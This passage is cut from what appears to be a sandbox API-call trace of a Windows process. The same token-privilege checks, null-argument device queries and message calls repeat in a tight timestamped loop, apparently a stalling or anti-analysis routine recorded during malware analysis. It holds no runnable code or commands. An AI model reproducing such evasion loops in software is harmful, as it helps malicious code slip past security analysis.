OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.995] GetLastError () returned 0x3f0 [0016.995] GetCurrentProcess () returned 0xffffffff [0016.995] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.995] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.995] SetLastError (dwErrCode=0x522) [0016.995] CloseHandle (hObject=0x114) returned 1 [0016.995] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.995] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.995] GetLastError () returned 0x578 [0016.995] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.995] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.995] GetCurrentThread () returned 0xfffffffe [0016.995] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.995] GetLastError () returned 0x3f0 [0016.995] GetCurrentProcess () returned 0xffffffff [0016.996] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.996] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.996] SetLastError (dwErrCode=0x522) [0016.996] CloseHandle (hObject=0x114) returned 1 [0016.996] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.996] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.996] GetLastError () returned 0x578 [0016.996] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.996] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.996] GetCurrentThread () returned 0xfffffffe [0016.996] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.996] GetLastError () returned 0x3f0 [0016.996] GetCurrentProcess () returned 0xffffffff [0016.996] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.996] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.996] SetLastError (dwErrCode=0x522) [0016.996] CloseHandle (hObject=0x114) returned 1 [0016.996] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.996] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.996] GetLastError () returned 0x578 [0016.996] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.996] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.996] GetCurrentThread () returned 0xfffffffe [0016.996] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.996] GetLastError () returned 0x3f0 [0016.996] GetCurrentProcess () returned 0xffffffff [0016.996] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.996] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.996] SetLastError (dwErrCode=0x522) [0016.996] CloseHandle (hObject=0x114) returned 1 [0016.996] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.996] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.996] GetLastError () returned 0x578 [0016.996] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.996] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.996] GetCurrentThread () returned 0xfffffffe [0016.996] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.996] GetLastError () returned 0x3f0 [0016.996] GetCurrentProcess () returned 0xffffffff [0016.996] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.996] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.996] SetLastError (dwErrCode=0x522) [0016.996] CloseHandle (hObject=0x114) returned 1 [0016.997] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.997] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.997] GetLastError () returned 0x578 [0016.997] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.997] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.997] GetCurrentThread () returned 0xfffffffe [0016.997] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.997] GetLastError () returned 0x3f0 [0016.997] GetCurrentProcess () returned 0xffffffff [0016.997] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.997] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.997] SetLastError (dwErrCode=0x522) [0016.997] CloseHandle (hObject=0x114) returned 1 [0016.997] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.997] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.997] GetLastError () returned 0x578 [0016.997] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.997] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.997] GetCurrentThread () returned 0xfffffffe [0016.997] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.997] GetLastError () returned 0x3f0 [0016.997] GetCurrentProcess () returned 0xffffffff [0016.997] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.997] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.997] SetLastError (dwErrCode=0x522) [0016.997] CloseHandle (hObject=0x114) returned 1 [0016.997] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.997] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.997] GetLastError () returned 0x578 [0016.997] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.997] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.997] GetCurrentThread () returned 0xfffffffe [0016.997] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.997] GetLastError () returned 0x3f0 [0016.997] GetCurrentProcess () returned 0xffffffff [0016.997] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.997] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.997] SetLastError (dwErrCode=0x522) [0016.997] CloseHandle (hObject=0x114) returned 1 [0016.997] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.997] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.997] GetLastError () returned 0x578 [0016.997] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.997] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.998] GetCurrentThread () returned 0xfffffffe [0016.998] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.998] GetLastError () returned 0x3f0 [0016.998] GetCurrentProcess () returned 0xffffffff [0016.998] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.998] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.998] SetLastError (dwErrCode=0x522) [0016.998] CloseHandle (hObject=0x114) returned 1 [0016.998] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.998] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.998] GetLastError () returned 0x578 [0016.998] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.998] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.998] GetCurrentThread () returned 0xfffffffe [0016.998] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.998] GetLastError () returned 0x3f0 [0016.998] GetCurrentProcess () returned 0xffffffff [0016.998] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.998] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.998] SetLastError (dwErrCode=0x522) [0016.998] CloseHandle (hObject=0x114) returned 1 [0016.998] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.998] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.998] GetLastError () returned 0x578 [0016.998] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.998] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.998] GetCurrentThread () returned 0xfffffffe [0016.998] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.998] GetLastError () returned 0x3f0 [0016.998] GetCurrentProcess () returned 0xffffffff [0016.998] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.998] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.998] SetLastError (dwErrCode=0x522) [0016.998] CloseHandle (hObject=0x114) returned 1 [0016.998] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.998] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.998] GetLastError () returned 0x578 [0016.998] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.998] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.998] GetCurrentThread () returned 0xfffffffe [0016.998] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.998] GetLastError () returned 0x3f0 [0016.998] GetCurrentProcess () returned 0xffffffff [0016.998] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.999] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.999] SetLastError (dwErrCode=0x522) [0016.999] CloseHandle (hObject=0x114) returned 1 [0016.999] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.999] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.999] GetLastError () returned 0x578 [0016.999] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.999] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.999] GetCurrentThread () returned 0xfffffffe [0016.999] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.999] GetLastError () returned 0x3f0 [0016.999] GetCurrentProcess () returned 0xffffffff [0016.999] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.999] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.999] SetLastError (dwErrCode=0x522) [0016.999] CloseHandle (hObject=0x114) returned 1 [0016.999] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.999] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.999] GetLastError () returned 0x578 [0016.999] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.999] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.999] GetCurrentThread () returned 0xfffffffe [0016.999] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.999] GetLastError () returned 0x3f0 [0016.999] GetCurrentProcess () returned 0xffffffff [0016.999] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.999] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.999] SetLastError (dwErrCode=0x522) [0016.999] CloseHandle (hObject=0x114) returned 1 [0016.999] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.999] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.999] GetLastError () returned 0x578 [0016.999] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.999] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.999] GetCurrentThread () returned 0xfffffffe [0016.999] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.999] GetLastError () returned 0x3f0 [0016.999] GetCurrentProcess () returned 0xffffffff [0016.999] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.999] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.999] SetLastError (dwErrCode=0x522) [0016.999] CloseHandle (hObject=0x114) returned 1 [0016.999] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.000] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.000] GetLastError () returned 0x578 [0017.000] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.000] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.000] GetCurrentThread () returned 0xfffffffe [0017.000] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.000] GetLastError () returned 0x3f0 [0017.000] GetCurrentProcess () returned 0xffffffff [0017.000] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.000] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.000] SetLastError (dwErrCode=0x522) [0017.000] CloseHandle (hObject=0x114) returned 1 [0017.000] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.000] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.000] GetLastError () returned 0x578 [0017.000] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.000] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.000] GetCurrentThread () returned 0xfffffffe [0017.000] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.000] GetLastError () returned 0x3f0 [0017.000] GetCurrentProcess () returned 0xffffffff [0017.000] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.000] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.000] SetLastError (dwErrCode=0x522) [0017.000] CloseHandle (hObject=0x114) returned 1 [0017.000] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.000] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.000] GetLastError () returned 0x578 [0017.000] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.000] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.000] GetCurrentThread () returned 0xfffffffe [0017.000] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.001] GetLastError () returned 0x3f0 [0017.001] GetCurrentProcess () returned 0xffffffff [0017.001] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.001] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.001] SetLastError (dwErrCode=0x522) [0017.001] CloseHandle (hObject=0x114) returned 1 [0017.001] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.001] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.001] GetLastError () returned 0x578 [0017.001] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.001] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.001] GetCurrentThread () returned 0xfffffffe [0017.001] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.001] GetLastError () returned 0x3f0 [0017.001] GetCurrentProcess () returned 0xffffffff [0017.001] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.001] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.001] SetLastError (dwErrCode=0x522) [0017.001] CloseHandle (hObject=0x114) returned 1 [0017.001] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.001] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.001] GetLastError () returned 0x578 [0017.001] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.001] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.001] GetCurrentThread () returned 0xfffffffe [0017.001] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.001] GetLastError () returned 0x3f0 [0017.001] GetCurrentProcess () returned 0xffffffff [0017.001] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.001] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.001] SetLastError (dwErrCode=0x522) [0017.001] CloseHandle (hObject=0x114) returned 1 [0017.001] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.001] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.001] GetLastError () returned 0x578 [0017.001] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.001] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.001] GetCurrentThread () returned 0xfffffffe [0017.001] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.001] GetLastError () returned 0x3f0 [0017.001] GetCurrentProcess () returned 0xffffffff [0017.001] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.001] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.001] SetLastError (dwErrCode=0x522) [0017.002] CloseHandle (hObject=0x114) returned 1 [0017.002] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.002] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.002] GetLastError () returned 0x578 [0017.002] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.002] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.002] GetCurrentThread () returned 0xfffffffe [0017.002] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.002] GetLastError () returned 0x3f0 [0017.002] GetCurrentProcess () returned 0xffffffff [0017.002] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.002] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.002] SetLastError (dwErrCode=0x522) [0017.002] CloseHandle (hObject=0x114) returned 1 [0017.002] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.002] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.002] GetLastError () returned 0x578 [0017.002] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.002] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.002] GetCurrentThread () returned 0xfffffffe [0017.002] OpenThreadToken (in: 